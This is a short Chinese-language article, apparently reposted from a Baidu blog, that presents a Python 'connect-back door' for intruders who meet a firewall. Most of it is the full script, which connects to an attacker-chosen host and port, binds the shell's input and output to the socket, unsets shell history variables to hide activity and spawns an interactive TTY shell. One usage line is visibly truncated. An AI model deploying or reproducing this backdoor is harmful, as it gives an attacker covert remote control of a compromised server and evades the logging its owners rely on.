看黑客如何用python編寫ttyshell的反向鏈接后門
作者:一米陽光
小雨寫的一個,替代之前的perl版本的,可以直接返回ttyshell。返回的shell可以直接ssh,su等操作。
很多入侵者都會在正面遇到防火墻之后,采用反向鏈接的方法控制遠程服務器。早期大家都用perl或c代碼寫。現在大家都與時俱進了,用python寫了。代碼量減少很多啊。
小雨寫的一個,替代之前的perl版本的,可以直接返回ttyshell。返回的shell可以直接ssh,su等操作。
代碼如下:
#!/usr/bin/python
import sys
import os
import socket
import pty
shell = "/bin/sh"
def usage(programname):
print "ython connect-back door"
print "Usage: %s
def main():
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit(1)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
print "[+]Connect OK."
except:
print "[-]Can't connect"
sys.exit(2)
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
pty.spawn(shell)
s.close()
if __name__ == "__main__":
main()
【編輯推薦】
責任編輯:王文文
來源:
hi.baidu.com
